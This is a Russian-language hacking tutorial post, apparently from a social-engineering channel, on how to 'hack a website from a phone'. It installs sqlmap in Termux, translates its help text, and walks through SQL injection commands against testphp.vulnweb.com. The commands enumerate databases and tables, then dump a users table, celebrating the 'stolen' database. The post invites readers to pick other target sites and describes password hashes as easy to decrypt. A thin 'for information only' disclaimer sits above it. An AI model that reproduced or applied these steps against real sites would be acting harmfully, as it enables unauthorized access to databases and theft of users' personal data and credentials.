Найти тему
Social_engineering

Как взломать сайт с телефона?

Данная статья не призывает к каким-либо противоправным действиям, а изложена исключительно в ознакомительных и развлекательных целях.

Итак начнем

Для этого нам опять понадобится Termux(Он есть даже в Play Market)

Заходим

Итак, а теперь пишем команды:

pkg upgrade

pkg update

pkg install git

pkg install python

pkg install wget 

git clone https://github.com/sqlmapproject/sqlmap.git

cd sqlmap

python sqlmap.py

Видим это:

-2

Если вы умеете читать по английски, то вы увидите, что ета хрень просит ввести параметры

А какие параметры:

Все параметры можно посмотреть вписывая команду

python sqlmap.py - h

Нам выйдет вот это:

-3

И для тех, кто не знает английский

Опции:

-h, --help показать основное сообщение справки и выйти

-hh показать расширенное сообщение справки и выйти

--номер версии шоу-программы и выход из нее

-v уровень детальной детализации: 0-6 (по умолчанию 1)

Цель:

По крайней мере один из этих вариантов должен быть предоставлен для определения

цель(ы)

-url у, --URL-адрес=URL-адрес целевого URL-адреса (например, "http://www.site.com/vuln.php?id=1")

-g GOOGLEDORK обрабатывает результаты Google dork в качестве целевых URL-адресов

Запрос:

Эти параметры можно использовать для указания способа подключения к целевому URL-адресу

--data=data строка данных, которая будет отправлена по почте (например, " id=1")

--cookie=COOKIE HTTP значение заголовка Cookie (например, " PHPSESSID=a8d127e..")

--случайный агент используйте случайно выбранное значение заголовка HTTP User-Agent

--прокси=прокси-Использовать прокси для подключения к целевому URL-адресу

--tor использует анонимную сеть Tor

--проверить-Тор проверить, чтобы увидеть, если Тор используется должным образом

Инъекция:

Эти параметры можно использовать для определения того, какие параметры следует тестировать,

обеспечьте пользовательские полезные нагрузки впрыска и дополнительные сценарии фальсификации

-p TESTPARAMETER тестируемый параметр (ы)

--СУБД=СУБД принудительно приводит бэк-энд СУБД к заданному значению

Обнаружение:

Эти параметры можно использовать для настройки фазы обнаружения

--level=уровень выполняемых тестов (1-5, по умолчанию 1)

--риск=риск выполнения тестов (1-3, по умолчанию 1)

Методы:

Эти параметры можно использовать для настройки тестирования конкретной SQL-инъекции

методы

-- техника=техника.. Используемые методы SQL-инъекции (по умолчанию " BEUSTQ")

Перечисление:

Эти параметры можно использовать для перечисления внутренней базы данных

информация, структура и данные системы управления, содержащиеся в

таблицы

- а-а, --все забирают все

-b, --banner извлечение баннера СУБД

--текущий пользователь извлекает СУБД текущего пользователя

--current-db извлечение текущей базы данных СУБД

-- пароли перечисляют хэши паролей пользователей СУБД

--таблицы перечисляют таблицы базы данных СУБД

--столбцы перечисляют столбцы таблицы базы данных СУБД

--схема перечисления схемы СУБД

--дамп дамп СУБД записи таблицы базы данных

--дамп-все дамп все записи таблиц баз данных СУБД

-D DB база данных СУБД для перечисления

-T TBL СУБД таблица(ы) базы данных для перечисления

-C COL СУБД таблица базы данных столбец (ы) для перечисления

Доступ к операционной системе:

Эти параметры можно использовать для доступа к серверному управлению базами данных

система, лежащая в основе операционной системы

-- подсказка os-shell для интерактивной оболочки операционной системы

-- запрос os-pwn для оболочки OOB, Meterpreter или VNC

Общие:

Эти параметры можно использовать для установки некоторых общих рабочих параметров

-- пакет никогда не запрашивает пользовательский ввод, используйте поведение по умолчанию

--flush-session файлы сеансов Flush для текущей цели

Разнообразный:

Эти параметры не вписываются ни в какую другую категорию

--sqlmap-подсказка оболочки для интерактивной оболочки sqlmap

--мастер простой интерфейс мастера для начинающих пользователей

[!] чтобы увидеть полный список опций, запускаемых с помощью '- hh'

СОГЛАСЕН ВЫГЛЯДИТ СТРАШНО НО

Сейчас вы поймёте, что к чему

ИТАК Я БУДУ ВЗЛАМЫВАТЬ САЙТ ПРЯМО СЕЙЧАС, ЧТОБЫ ПОКАЗАТЬ НАГЛЯДНО

выберу жертву (какая попадётся)

http://testphp.vulnweb.com/listproducts.php?cat=1 (можете выбрать другой сайт)

уязвимо для атаки

Итак прописываем

python sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

Итак мы можем увидеть все базы данных

В моем случае это:

-4

Дальше, чтоб в неё попасть прописываю:

python sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

Вот таблица базы

-5

Дальше, чтоб попасть в саму базу данных мы пишем ту, что хотим (и есть в таблице)

Я хочу украсть юзеров так что прописываю

python sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --colums

(многие базы зашифрованы, но их легко расшифровать, потому что некоторые используют такие шифрования как MD5 base64 итд)
(многие базы зашифрованы, но их легко расшифровать, потому что некоторые используют такие шифрования как MD5 base64 итд)

И последняя команда, (пиздим базу данных, делаем дамп, как хотите)

python sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --dump

Всё!!! Поздравляю, БД спизжена!!!

Надеюсь вам понравилась статья)